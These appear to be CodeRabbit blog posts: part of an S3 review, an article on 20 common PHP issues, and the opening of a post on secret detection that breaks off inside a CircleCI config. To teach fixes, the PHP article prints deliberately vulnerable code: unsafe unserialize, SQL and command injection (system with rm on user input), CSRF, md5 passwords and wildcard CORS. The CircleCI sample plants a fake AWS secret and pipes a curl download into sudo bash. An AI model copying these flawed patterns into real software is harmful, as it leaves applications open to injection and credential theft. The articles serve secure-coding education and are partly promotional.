![](https://victorious-bubble-f69a016683.media.strapiapp.com/cc093a5c6eed5f1e3df97bd8c13cd4cfaf5b009ce68b7c2b181ffaf22bddb06f_28e5f27cfa.png) It has identified that versioning is currently disabled for the S3 bucket, which could pose a risk to data integrity. With versioning disabled, recovering from accidental deletions or modifications becomes difficult, which is especially critical in a data lake environment. To enhance data protection and ensure compliance, it recommends enabling versioning. This will allow for preserving, retrieving, and restoring every version of an object in the bucket, improving the resilience and reliability of data storage. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/659c53e78d29e59a850c236c6cc26f097eeb6fbe14aa0267cc17b2ce9db2bfca_2b1d23b411.png) It suggests that the S3 bucket name is hardcoded in the configuration, which limits the flexibility of your Terraform setup and makes it harder to maintain across multiple environments (e.g., dev, staging, production). To improve this, it suggests replacing the hardcoded bucket name with a variable. This would make the configuration more reusable and adaptable, allowing different bucket names to be used depending on the environment. As seen, Coderabbit identified potential security risks in the S3 bucket configuration, including public access, permissive CORS settings, and lack of encryption, along with desirable solutions to mitigate these risks. ## Secure your S3 Infrastructure with AI Code Reviews Minor configuration oversights today can become major security incidents tomorrow. CodeRabbit automatically reviews your S3 configurations during development, helping you ship secure code with confidence. Join thousands of development teams who have secured their cloud infrastructure with CodeRabbit's automated code reviews. [Sign up in 2 minutes](https://www.coderabbit.ai/), and get your first PR review in 10 minutes.

How to Fix 20 Common PHP Issues With AI

Aravind Putrevu — Mon, 18 Nov 2024 00:00:00 GMT

PHP is still one of the most popular languages for server-side scripting because it’s simple, adaptable, and backed by an extensive [](https://php.libhunt.com/)lib[r](https://php.libhunt.com/)ary of frameworks and tools. However, its widespread adoption also comes with common coding challenges that can lead to security vulnerabilities, maintainability issues, poor performance, and inferior code quality. As a PHP developer, team lead, or software engineer, you’ll often encounter recurring issues such as **SQL injection vulnerabilities**, **inefficient queries, poor error handling**, and **code duplication** that can slow down the development process, introduce bugs, and expose applications to security risks if not adequately addressed. In recent years, AI has transformed the software development lifecycle. [AI code review tools](https://www.coderabbit.ai/blog/code-reviews-made-easy-how-to-improve-code-quality) like CodeRabbit automate the identification and resolution of coding issues, making it easier for programmers to write cleaner, more efficient, and more secure PHP code. These tools help you review code quality and streamline the process of identifying errors, suggesting fixes, and maintaining high standards for your source code. This article will guide you through the following 20 common issues in PHP code and provide practical solutions using CodeRabbit as demonstrated in these pull requests: [PR 1](https://github.com/rojesh1993/PHPIssues/pull/1) and [PR 2](https://github.com/rojesh1993/PHPIssues/pull/2). By the end, you will better understand how AI can assist in fixing certain errors while improving code quality, security, and overall development productivity. I tried to make this list as comprehensive as possible, so feel free to skip any that you’ve already addressed. **TL;DR: List of Common PHP Issues** To give you a quick glance at the issues, here’s a breakdown of the issues, grouped by their frequency, impact, and relevance to PHP development: **Critical and Often Overlooked:** the issues highlighted here are some of the most impactful yet frequently underestimated by developers. Addressing them is vital for maintaining secure and efficient applications. 1. Insecure deserialization 2. Misconfigured session management 3. Inefficient caching 4. Inefficient file handling 5. Improper use of arrays **Important and Relevant but Often Missed:** these issues might not always be obvious but can significantly affect application performance, security, and maintainability. 6. Security vulnerabilities 7. Command injection 8. Insecure password handling 9. Improper use of static methods 10. Cross-Origin Resource Sharing (CORS) 11. Poor error handling 12. Deprecated functions 13. Hardcoding configuration data **Worth Addressing for Overall Code Quality:** these issues contribute to better code quality and cleaner architecture when resolved. 14. Uncaught fatal errors 15. Inefficient queries 16. Lack of unit tests 17. Memory leaks 18. Code duplication 19. Over-complicated code 20. Inconsistent coding style You can fix these manually or turn to an AI tool. To implement AI-suggested fixes, sign up to [Co](https://www.coderabbit.ai/)[d](https://www.coderabbit.ai/)[eR](https://www.coderabbit.ai/)[abb](https://www.coderabbit.ai/)[it](https://www.coderabbit.ai/) and give it [access to your GitHub Repo](https://docs.coderabbit.ai/platforms/github-com/). CodeRabbit will be ready to review every pull request in the repo automatically. ## Issue #1: Insecure Deserialization Insecure deserialization occurs when untrusted data is deserialized without proper validation, allowing attackers to inject malicious data structures or manipulate application logic. Deserialization with functions like `unserialize()` on user-controlled data can lead to code execution, data manipulation, or privilege escalation. ```php // Deserialization with unserialize function $data = $_POST['data']; $object = unserialize($data); ``` As shown in the image below, with the help of AI code review tools, you can use the JSON serialization function instead of PHP serialization to avoid deserializing untrusted input, which could lead to potential security vulnerabilities ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b6fb81e7590d7d9fedbc1203dc62e7ce9d196004f34855bcd2b619627267d276_f4b2475580.png) ## Issue #2: Misconfigured Session Management Session management is one of those things that you might not think about until it goes wrong. Without secure session handling, your app could be vulnerable to session hijacking or unauthorized access. ```php // Insecure session setup session_start(); ``` Experienced developers typically have templates for setting up secure sessions. Automated tools can identify weak session settings and suggest improvements, such as setting secure cookies, regenerating session IDs, and implementing session timeouts. These adjustments help ensure user sessions remain safe and secure. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5eef37113275d2f849fea9a5a2fd752124a03852c5072279ca598846d31ac913_dd5dce9c76.png) Alternatively, you can also * Regenerate session IDs on login to prevent session fixation. * Use **secure, HTTP-only cookies** for session management. * Enforce **session timeouts** and other security best practices. These improvements help secure user sessions, reducing the chances of account compromise. ## Issue #3: Inefficient Caching Without caching, your app can repeatedly make the same database calls, causing slowdowns and consuming resources, especially when handling repetitive tasks like database queries or API calls. ```php // No caching, querying the database on every page load $query = "SELECT * FROM posts"; $result = mysqli_query($connection, $query); ``` AI code review tools can help identify areas where caching can improve performance and suggest optimal strategies, as shown in the image below. This approach boosts data retrieval speed and reduces unnecessary server load." ![](https://victorious-bubble-f69a016683.media.strapiapp.com/77a84bfa960d0ba0c1785fac73a7c607fe2627ebcfa0bc3af2e44821ed9c97ec_1764c5d797.png) In this case, CodeRabbit suggestions are standard practices for caching across all programming languages: * Implementing [**Redis**](https://redis.io/) or [**Memcached**](https://www.memcached.org/) for in-memory caching. * Leveraging [**object caching**](https://nelkodev.com/en/blog/how-to-implement-caching-in-php-to-improve-performance/) for database queries or external API calls. By automating the identification of caching opportunities, AI code review tools help developers improve application performance and reduce load times. ## Issue #4: Inefficient File Handling If you read or write large files all at once, you risk performance issues or even crashes. Loading large files into memory may cause high usage or even exhaust available memory. ```php // loading a large file into memory $data = file_get_contents('largefile.json'); ``` Many inefficient file I/O operations go undetected if you check manually; AI code review tools like CodeRabbit can help you identify such situations. Here is a snapshot of issues raised by the tool regarding the inefficient file handling of a large JSON file. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c57d5325d17bf0a094a8d5fb8f386f1e602ca9915d2f3c76d772c3b18f2cb743_32e4fbe8b6.png) The tool suggests ways to write better code and improve software quality like: * Using **streaming techniques** to handle large files in smaller chunks. * Implementing **buffering strategies** to optimize file reads and writes. This results in faster file handling, reduced memory consumption, higher quality, and improved performance. ## Issue #5: Improper Use of Arrays PHP’s dynamic arrays are powerful but can lead to performance issues if not used efficiently, especially with large datasets. ```php // Iterate over users array and extract name field into another array $names = []; foreach ($users as $user) { $names[] = $user['name']; } ``` With automated tools, you can identify missed caching opportunities and receive suggestions for optimal alternatives to improve performance, as you have below: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/af8819bfec9453aef688e281f7af83a2fc75cd8c77aedbbd4154561c64f0baad_14b797f11c.png) Built-in functions like `array_column()`, `array_map()`, or `array_filter()` could be more efficient compared to loops. Optimizing array handling can significantly boost performance in PHP applications dealing with large data volumes. ## Issue #6: Security Vulnerabilities Your PHP applications often face vulnerabilities like [**SQL injection**](https://en.wikipedia.org/wiki/SQL_injection)**,** [**Cross-Site Scripting (XSS),**](https://en.wikipedia.org/wiki/Cross-site_scripting) and [**Cross-Site Request Forgery (CSRF)**](https://en.wikipedia.org/wiki/Cross-site_request_forgery). When you do not validate or sanitize your input properly or mishandle user data, attackers can inject malicious code, compromising the entire database. Similarly, insecure session handling or lack of password hashing can expose sensitive user information, leading to potential data breaches. Though not very common in modern applications, SQL injections are still a significant concern in applications with direct database interactions or user-generated content. Here’s a simple example of SQL injection. ```php // Retrieve the 'username' parameter and use it to construct a SQL query to select all columns from users $user_input = $_GET['username']; $query = "SELECT * FROM users WHERE username = '$user_input'"; $result = mysqli_query($connection, $query); ``` Directly including user inputs in SQL queries is an unsafe method of handling user input in web pages and a potential SQL injection vulnerability in the query construction. The details provided by an automated tool are shown in the snapshots below: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/60fcc2f4c1198b5704e23963e9aa25da93d39508c2346c332a4f5a4db71ab23e_2074e990b1.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/df1ecb53061cfd4bf62ef288e6b7199184a3f5a01cd4fd0986102a36dd59f013_45c516c46f.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9c3d7eaa28891821634a2c9cdba74baaae89619f70123093f4616a57d01aeeab_24e86a2228.png) The recommended actions used in standard practice are as follows: * Using **prepared statements** in SQL queries to prevent SQL injection. * Applying **input validation and sanitization** and output escaping to prevent XSS attacks. * Use **Object-Relational Mapping (ORM)** libraries to handle query parameterization. Similarly, CSRF exploits the trust that a web application has in the user’s browser. When a user is authenticated, their browser automatically includes session cookies and other credentials in requests to the web application. An attacker crafts a malicious request and tricks the user into executing it, often through social engineering techniques like sending a link via email or embedding it in a malicious website. The web application processes the request as if it were a legitimate action from the authenticated user. ```php // start a session and process a post request to transfer amount to a recipient (vulnerable to CSRF session_start(); if ($_SERVER['REQUEST_METHOD'] === 'POST') { $amount = $_POST['amount']; $recipient = $_POST['recipient']; // Process the transfer (vulnerable to CSRF) echo "Transferred $amount to $recipient"; } ``` ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0d4d9b6b600e9b10ed198ce7ba6a74e8ae45f238a364651e4086eb76a069585f_d1af6e8abb.png) From the image above, an automated tool detected the following security issues and suggested code improvements: 1. CSRF vulnerability allows unauthorized transfers 2. Missing input validation and sanitization 3. No authentication check 4. Potential XSS vulnerability in the echo statement Automating these checks can drastically reduce security risks and ensure your applications are better protected against these common attacks. ## Issue #7: Command Injection Functions like `exec()`, `shell_exec()`, `system()`, and `passthru()` execute system commands and can be exploited if they incorporate user input directly dangerous. An attacker may inject malicious system commands into input fields, which can be executed by the server if there is no input validation or sanitization of user inputs. ```php // Running system commands with input data $filename = $_GET['filename']; system("rm $filename"); ``` AI code review tools can easily detect this risky command injection vulnerability and recommend safer alternatives, such as using the `unlink()` function. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/fd86dd062fafc01b912a99585b99c8f5ee5d8eb7c6c558c458fbdf75cad8c74a_7199437504.png) ## Issue #8: Insecure Password Handling Storing passwords insecurely is a major risk. If you store passwords in plain text or use weak hashing algorithms, this can lead to security vulnerabilities. ```php // Insecure password storage $password = md5('password123'); ``` AI code review tools can detect insecure password storage practices and suggest using **strong hashing algorithms** like [**bcrypt**](https://en.wikipedia.org/wiki/Bcrypt) o[r **Argo**](https://en.wikipedia.org/wiki/Bcrypt)[**n2**](https://en.wikipedia.org/wiki/Argon2) to protect sensitive user data. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/289ef8fe4408a39911b2962ef0705b07f0d31c71104fbb577b2fedb3febbce48_97784426b5.png) ## Issue #9: Improper Use of Static Methods Overusing static methods in PHP can make code less flexible and harder to test. ```php // Static method overuse class User { public static function getName() { return "John"; } } ``` Integrating automated tool helps identify the overuse of static methods, as shown below: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b48559eb193e152df28156e52be09d9bfbb4849263c0105799686b7190690da9_ba579ce0de.png) Refactoring the code with the following suggestions can help improve the code quality: * Converting static methods to instance methods where appropriate. * Applying object-oriented principles like **polymorphism** to improve code flexibility. ## Issue #10: Cross-Origin Resource Sharing (CORS) Cross-Origin Resource Sharing (CORS) is a security feature implemented by web browsers to control how web pages can request different domains (origins). CORS is designed to protect users by enforcing the Same-Origin Policy (SOP), which restricts web pages from requesting a different origin than the one that served the web page. It helps prevent malicious websites from making unauthorized requests on behalf of a user, which could lead to security issues like data theft or unauthorized actions. Misconfigurations can easily lead to errors. ```php // Configuration that allows Cross-Origin access header("Access-Control-Allow-Origin: *"); // Allows any domain to access the resource header("Access-Control-Allow-Methods: GET, POST, PUT, DELETE"); // Allows all HTTP methods header("Access-Control-Allow-Headers: *"); // Allows all headers header("Access-Control-Allow-Credentials: true"); // Allows credentials (cookies, authorization headers, etc.) ``` Configuring CORS correctly can be tricky for developers. It requires configuring precise CORS settings on the server, and developers usually need to balance security with functionality. CORS issues often arise when moving from a development environment to a production environment with a different domain. With automated tools, you can identify misconfigured CORS headers that pose security risks and receive tailored configuration suggestions, as shown in the image below: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6a68bdb43a9e8bb01e71ef1cf11dd0e41ad053106fe8377c72b234129d20fdca_2348edec1e.png) ## Issue #11: Poor Error Handling You’ve encountered code crashes, often leaving you with no valuable information to trace the problem. Inadequate error handling can make it feel like you’re chasing ghosts in your codebase as you search for the source of the issue. This often complicates debugging and negatively affects your productivity. ```php // File handling without any error handling $data = file_get_contents('data.txt'); ``` Gaps in error handling, such as missing try-catch blocks or a lack of appropriate tests for handling the situation (file handling in this case), may lead to potential errors or warnings. The file may not exist or may be inaccessible. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3d004f11e6f5fca22a2f6c1762605bc44b18b5733500be33b23faaeb37199a0c_b262dbb8cf.png) Other best practices can also be implemented, such as: * Wrapping potentially error-prone code (e.g., database operations, file handling) in try-catch blocks. * Logging errors and handling exceptions in a way that ensures graceful recovery. These suggestions help improve your application's quality code and robustness, minimizing the likelihood of unhandled exceptions affecting performance or user experience. ## Issue #12: Deprecated Functions Using deprecated functions is like walking on thin ice—they might work now but can break in future PHP versions. ```php // Use of deprecated function split() for splitting string $var = split(',', $string); ``` Automated review tools can automatically flag deprecated functions and suggest modern alternatives, ensuring your code is future-proof and less vulnerable to compatibility issues. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/68c3e623bae89d4f7b6f22d36c1219e3e35d158d830c9df9b3152e53762bfcd2_3f61d821ff.png) ## Issue #13: Hardcoding Configuration Data Hardcoding sensitive data (e.g., database credentials, API keys) in your PHP files poses security risks, especially when your code is shared or deployed. Hardcoding configuration data is generally considered an anti-pattern due to known security and maintainability issues. ```php $API_KEY = 'ThisISsomeRandomAPIKey' ``` With modern secrets management tools such as AWS Secrets Manager, Azure Key Vault, or HashiCorp Vault, this is rare. However, many new developers might hardcode certain configurations directly into source code due to the perceived simplicity of hardcoding. Some of the most common hard-coded configurations are: * Database credentials such as host, database name, even username and password. * API Keys and tokens for third-party services. * File paths and URLs to important files or directories * Application settings and flags. As shown below, automated tools can detect hardcoded values in your PHP code and recommend secure alternatives, such as using environment variables or secrets management systems. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/57f9f07ab23f516caec3bfc93e65f07bb901e4473e0cc9e2956f205062b685ad_57d32c7078.png) Here are some recommended best practices and tool to handle configuration and credentials: * Storing sensitive data in environment variables or configuration files. * Using tools like dotenv to load environment variables securely. ## Issue #14: Uncaught Fatal Errors Uncaught fatal errors, such as those caused by missing functions or classes, can crash an entire PHP application. These errors make the system unavailable until the issue is resolved, leaving users with a frustrating experience. ```php // Fatal error due to undefined function $result = getUserDetails; ``` AI tools can scan for areas where fatal errors might occur and suggest ways to handle them better, making your application run more smoothly. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/56d47527980ebc17307348480aab49ee87c7ca0856d093d578bcd1d4929e9581_e6784a2bc6.png) In such situations, as we have in the image above, the recommendation is to: * Implementing a **global error handler** to catch fatal errors. * Using **custom error handling functions** to log issues and present user-friendly error pages rather than crashing the application. This ensures that your application can remain operational and user-friendly even in a serious error. ## Issue #15: Inefficient Database Queries Inefficient database queries are a common bottleneck for your app’s performance. If you’re fetching too much data, running unnecessary joins, or missing crucial indexes, your app can end up painfully slow. Such unoptimized database queries can lead to performance bottlenecks and scalability issues, particularly when dealing with large datasets. ```php // Inefficient database query: selecting all $query = "SELECT * FROM users"; $result = mysqli_query($connection, $query); ``` Identifying these inefficient queries can be challenging, but this issue can be optimized by adding indexes or fetching only the necessary columns. Through such optimization, you can keep your app running fast and smoothly, even under heavy loads. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5f082362c27bed37548f812d2d3b5c8649ae032516a772b05f2433e26cd20424_2091ae30f5.png) Code review tools can help analyze your database queries for inefficiencies such as: * Unoptimized SELECT queries that fetch unnecessary data. * Missing or inappropriate use of indexes. It suggests query optimizations, such as adding appropriate indexes, reducing the number of table joins, and selecting only the required columns. ## Issue #16: Lack of Unit Tests Testing might not be the most exciting part of coding, but it’s essential for ensuring reliability. Skipping tests often leads to bugs slipping into production, making maintaining code quality challenging. ```php // function to add two numbers function add($a, $b) { return $a + $b; } ``` Automated tools like CodeRabbit can highlight areas of your codebase that lack test coverage. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/74ef66874634bf8fec232f086372e8757a205e95c12cb7e1c898a054f2f5ebed_60d5ac7c48.png) It is usually recommended to: * Write **unit tests** for every critical logic. * Use testing frameworks like **PHPUnit** to ensure the reliability of your code By automating the process of identifying untested code, these tools make your code more reliable and easier to maintain. ## Issue #17: Memory Leaks Memory leaks can quietly consume server resources, especially if you don’t close database connections or release resources. ```php // Memory leak due to unclosed connection $connection = new mysqli($host, $user, $pass, $db); ``` Automated review tools can detect potential memory leaks by analyzing your code for inefficient use of resources (e.g., large object allocations not being freed). ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3559b9635f8bc99fef47d334bc085572323b29b706e466625f7bd536a11d2826_5f6cf70f1c.png) It suggests solutions like: * Properly closing database connections and file handles. * Using tools like **Garbage Collection** more effectively. This helps maintain the performance and scalability of your application, especially under heavy load. ## Issue #18: Code Duplication You've likely copied and pasted codes and unintentionally created a mess of duplicated business logic throughout your project. Repeated blocks of code across a project lead to higher maintenance costs and increase the chances of bugs when changes are made. The following code consists of code duplication logic for connecting to the database, executing a query, and processing the results, which is repeated for fetching user and product data. ```php // Fetch user data $conn = connectDatabase(); $sql = "SELECT * FROM users"; $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { echo "User: " . $row["username"] . "
"; } } $conn->close(); // Fetch product data $conn = connectDatabase(); $sql = "SELECT * FROM products"; $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { echo "Product: " . $row["product_name"] . "
"; } } $conn->close(); ``` Duplicate code logic increases the risk of bugs and the effort required to maintain the code. Refactoring the code by eliminating redundant sections with reusable functions or classes can improve the code quality. This keeps your codebase DRY (Don’t Repeat Yourself) and less error-prone. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/635f172f1ea377cda7f40c27c02451b536361446315f791ba5b613c12fa3eff3_881a884100.png) AI code review tools like CodeRabbit promote the (Don't Repeat Yourself) **DRY principle** by: * Identifying sections of duplicated logic. * Recommending ways to consolidate common functionality into reusable functions or classes. This reduces redundancies and makes future maintenance easier and less error-prone. ## Issue #19: Over-Complicated Code Sometimes, your code becomes overly complex with deeply nested loops or conditionals, making it hard to read, debug, and maintain, leading to potential issues as your project evolves. ```php // Complex nested conditionals if ($a == 1) { if ($b == 2) { if ($c == 3) { echo "Success"; } } } ``` You can manually assess the code’s complexity, but this is time-consuming. This is where an AI code review tool like CodeRabbit can be really helpful. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d149c774bfbfa7b7455c4315c10d064057bf401c1e1a889c20a2c1aa370faa0c_118986b2e4.png) You could improve the code complexity by: * Breaking large functions into smaller, more manageable ones. * Reducing deeply nested loops or conditionals. Simpler code is easier to maintain, which reduces the likelihood of future bugs and makes your application more scalable. ## Issue #20: Inconsistent Coding Style Inconsistent coding styles can make your team projects messy and make collaboration difficult. With varying indentation, naming conventions, and formatting, the codebase can quickly become disorganized. ```php // Non-conventional function naming style function get_user_Data() { return "User data"; } ``` Like some popular PHP linting tools, such as [PHP\_CodeSniffer](https://github.com/squizlabs/PHP_CodeSniffer) [and PHPStan,](https://github.com/squizlabs/PHP_CodeSniffer) automated tools also offer automatic formatting and style consistency checks based on popular coding standards, such as PSR-2 and PSR-12. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e5aaf303b6040b6f9a058da2f95eaaf48d9806a3f73f555c0070c16f47e00275_47057c5347.png) By enforcing consistent coding and development practices, you can: * Ensure cleaner, more readable code. * Reduce friction when collaborating with other developers. ## What’s Next? While this article has covered 20 common PHP issues and how AI tool like CodeRabbit addresses them, several additional challenges deserve your attention: * **Advanced Error Reporting**: As applications scale, error reporting and monitoring tools like [Datadog](https://www.datadoghq.com/) become important. Look into integrating AI-driven monitoring solutions for a proactive approach. * **Version Updates**: PHP versions are released with updates that enhance security and performance. Tracking these updates by visiting the official [PHP Release Page](https://www.php.net/releases/) and keeping your applications current is effective for staying ahead of vulnerabilities. Adopting these strategies can further enhance the quality of your PHP projects and prepare your applications for long-term success. ## Conclusion Developing robust PHP applications requires addressing a range of considerations, from optimizing performance to ensuring code quality and security. Addressing these problems manually can be time-consuming and error-prone, especially as applications grow in size and complexity. However, AI tools like [**CodeRabbit**](https://coderabbit.ai/) simplify this by automating the detection and resolution of common PHP issues, saving time and improving development efficiency. From improving security by eliminating vulnerabilities like SQL injection to enhancing code quality, this article explored 20 scenarios where CodeRabbit can significantly simplify the development process. Integrated with your repository, it automates code reviews in pull requests, identifies potential issues, and supports thorough testing and debugging. Sign up to [CodeRabbit](https://coderabbit.ai/) for a free trial and experience automatic reviews that enhance your application's quality while helping your team work faster and better. You can also join the [Discord channel](https://discord.gg/coderabbit) to connect with a community of developers, share insights, and discuss the projects you're working on.

How CodeRabbit Detects Secrets and Misconfigurations in IaC workflow?

Atulpriya Sharma — Tue, 12 Nov 2024 00:00:00 GMT

As technology accelerates at breakneck speed, integrating security into the development process has become paramount, especially following [GitLab's recent release of critical updates addressing 17 vulnerabilities, one of which carries a CVSS score of 9.6.](https://www.developer-tech.com/news/gitlab-update-addresses-pipeline-execution-vulnerability/) As Ray Kelly from Synopsys Software Integrity Group aptly points out, mentioning vulnerabilities in development workflows can be alarming. The "shift-left" approach integrates security earlier in development, complicating CI/CD workflows and adding pressure on developers. This often leads to frustration and potential bottlenecks in the development process. SecOps teams play a crucial role in managing security without disrupting progress, particularly concerning the exposure of secrets like API keys, which are often caused by automation and misconfigurations. In this post, we'll explore how CodeRabbit can help by automatically reviewing configuration files in your codebase. It identifies potential issues early in the pipeline, ensuring your infrastructure configurations are secure while allowing development to move quickly and efficiently. ## Why Secret Detection and IaC Scanning are Essential Organizations must prioritize robust security measures in the wake of increasing cyber threats, particularly highlighted by incidents like the [SolarWinds attack, where hackers inserted malicious code into a widely used software update](https://about.gitlab.com/blog/2021/08/18/what-the-solarwinds-attack-can-teach-us-about-devsecops/). This incident underscores vulnerabilities in the software supply chain, affecting many organizations. Automated security solutions such as Secret Detection and Infrastructure as Code (IaC) scanning have emerged as vital tools helping teams to proactively identify vulnerabilities that could lead to unauthorized access and data breaches. ### Prevent Unauthorized Access to Systems and Data Secret Detection is vital for preventing unauthorized access to critical systems and sensitive data by identifying hardcoded secrets and credentials within codebases. For example, in 2016, [Uber suffered a significant breach](https://www.trendmicro.com/vinfo/ph/security/news/cybercrime-and-digital-threats/uber-breach-exposes-the-data-of-57-million-drivers-and-users) when attackers accessed a private GitHub repository and discovered hardcoded AWS credentials. This oversight allowed them to steal personal data from 57 million riders and drivers, emphasizing the critical need for vigilant secret management to protect user data. ### Avoid Misconfigurations that Create Security Vulnerabilities IaC scanning is essential for identifying insecure configurations in cloud infrastructure, helping teams avoid misconfigurations that can expose systems to threats. A [recent incident](https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/) involved Palo Alto Networks discovering threat actors compromised 110,000 domains by exploiting exposed environment variable files containing sensitive information like AWS access keys. ### Protect Sensitive Data from Accidental Exposure Secret Detection tools help ensure that sensitive data, such as passwords and personal information, are not inadvertently exposed in logs or code. A recent example involved [Sourcegraph, where an access token was mistakenly published in a public code commit](https://www.bleepingcomputer.com/news/security/sourcegraph-website-breached-using-leaked-admin-access-token/). This token had broad privileges, allowing attackers to create new accounts and gain access to the admin dashboard. ### Ensure Compliance with Security Policies and Regulations Automated scanning tools assist organizations in adhering to security policies and regulations by flagging non-compliant configurations. For example, companies in regulated industries can implement [Open Policy Agent](https://github.com/open-policy-agent/opa) (OPA) or [Kyverno](https://github.com/kyverno/kyverno) rules to enforce organizational policies proactively. CodeRabbit, for instance, can run [Regolint](https://docs.coderabbit.ai/tools/regal/) to help enforce rules and ensure compliance. By using IaC scanning, organizations ensure their infrastructure configurations meet regulatory standards, avoiding potential fines and legal complications. ### Reduce the Risk of Unsecured Cloud Resources IaC scanning can identify unsecured cloud resources, such as overly permissive security groups or exposed endpoints. A [report](https://www.darkreading.com/vulnerabilities-threats/exposed-container-orchestration-systems-putting-many-orgs-at-risk) states, “A significant risk was highlighted when organizations misconfigured cloud environments, allowing public access to critical data without proper security measures.” You can find many such misconfigured environments on [Shodan](https://www.shodan.io/). Proactive scanning can reveal these vulnerabilities before they are exploited, preventing potential downtime and reputational damage. ## Challenges in CI/CD Pipelines Related to Security As organizations increasingly adopt automated security measures like Secret Detection and Infrastructure as Code (IaC) scanning, it’s essential to recognize the challenges that still persist within CI/CD pipelines. While these tools enhance security, they also highlight the complexities of maintaining a secure development environment. ### High Frequency of Changes Increases Risk Exposure The rapid pace of development in CI/CD pipelines leads to frequent and substantial code changes, each creating opportunities for security vulnerabilities, increasing the risk of security risks. For example, companies like AWS deploy code updates approximately every 20 seconds, highlighting the need for continuous monitoring to ensure security. This dynamic environment necessitates continuous vigilance to ensure that new code does not compromise existing security measures. ### Manual Code Reviews are Time-Consuming and Error-Prone While manual code reviews are essential for identifying security flaws, they can be labor-intensive and prone to human error. As the volume of code increases, the likelihood of missing critical vulnerabilities also rises, making this method increasingly unreliable. [The October 2021 Facebook outage](https://riskledger.com/resources/facebook-outage) exemplifies how oversights can compromise system integrity, particularly when under pressure to implement rapid changes. The incident was caused by a “configuration change” in the system managing Facebook's global backbone network capacity, which led to a complete disconnection of server connections between their data centers and the internet. Integrating Security Checks Without Slowing Down the Pipeline Incorporating security checks into CI/CD pipelines is necessary but can lead to bottlenecks if not done efficiently. Teams must find a balance between thorough security assessments and maintaining the speed of the development cycle. Striking this balance is crucial for ensuring that security does not hinder innovation and productivity. ## Using CodeRabbit for Secret Detection and IaC Scanning Effective solutions become essential as companies tackle the complexities and challenges of sustaining security in CI/CD pipelines, particularly with increasing vulnerabilities and rapid development cycles. Given these pressing needs, CodeRabbit serves as a powerful AI-powered code review tool, analyzing configuration files to identify issues ensuring best practices and compliance. It provides real-time, context-aware feedback, helping developers streamline workflows and enhance code quality without traditional security tool complexities. Integrating with tools like Checkov, Yamllint, and Gitleaks, CodeRabbit strengthens development security by empowering teams to identify vulnerabilities and suggest fixes swiftly and seamlessly. * [Checkov](https://docs.coderabbit.ai/tools/checkov): Scans Infrastructure as Code templates for misconfigurations, ensuring that cloud resources are set up securely. * [Yamllint](https://docs.coderabbit.ai/tools/yamllint): Checks YAML files for syntax errors and adherence to best practices, vital for maintaining operational integrity. * [Gitleaks](https://docs.coderabbit.ai/tools/gitleaks): Identifies hardcoded secrets within Git repositories, preventing accidental exposure of sensitive information such as passwords and API keys. Simply enabling these tools in CodeRabbit’s configuration automates Infrastructure as Code (IaC) scanning, making security an integral part of your development process. Let’s see how it employs these for automated reviews in IaC scanning. ## Securing CircleCI Deployments with CodeRabbit To demonstrate the functionality of CodeRabbit in detecting secrets and security issues, we voluntarily introduced issues in our CircleCI setup, such as incorrect configurations, leaked secrets, etc. Before running the tests, we [configured CodeRabbit in our repository](https://coderabbit.ai/blog/how-to-integrate-ai-code-review-into-your-devops-pipeline) using a straightforward two-click setup. The codeRabbit will effectively identify potential security risks in real-time. Upon submitting a pull request, it automatically reviews the file and generates a structured report with the following key sections: * **Summary**: An overview of the key changes detected, highlighting areas that need attention. * **Walkthrough**: A step-by-step analysis of the reviewed files, detailing specific issues and recommendations. * **Table of Changes**: A table listing all changes in each file along with a change summary for prioritization. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d75325a36551f8a2fc0dde66b065dc3be53b7761a1cd9b3d2c7439b82b06e1e5_17bffc00af.png) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5a9ae7c10de864a2ec6b04f3d0011a9bacde2b85ab556014d97d9e98ea63c21a_26daef471c.png) Here is a diagram illustrating the sequence of tasks in the CircleCI configuration file we created. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/eeaf91d2e6068fd8c2416d03b14779860756da867939cfc291355ea7d7d53890_a652263814.png) Here’s the sample config.yml file that we will use to demonstrate CodeRabbit's capabilities in identifying potential misconfigurations and exposed secrets, providing actionable insights and recommendations to enhance the security and reliability of your code. ```yaml version: 2.1 executors: python-executor: docker: - image: circleci/python:3.8 working_directory: ~/expense_tracker jobs: lint: executor: python-executor steps: - checkout - run: name: Install Node.js command: | curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash - sudo apt-get install -y nodejs - run: name: Lint JavaScript code command: npm run lint yaml_lint: docker: - image: circleci/python:3.8 steps: - checkout - run: name: Install YAMLlint command: | sudo apt-get update sudo apt-get install -y npm sudo npm install -g yaml-lint - run: name: Lint YAML files command: | yaml-lint **/*.yaml || true gitleaks: docker: - image: zricethezav/gitleaks:v8.3.0 steps: - checkout - run: name: Run Gitleaks command: | echo "AWS_SECRET_ACCESS_KEY=A9B8C7D6E5F4G3H2I1J0K9L8M7N6O5P4Q3R2S1" > app.py gitleaks detect --source . --report-format json --report-path gitleaks-report.json cat gitleaks-report.json build: executor: python-executor steps: - checkout - run: name: Install Node.js command: | curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash - sudo apt-get install -y 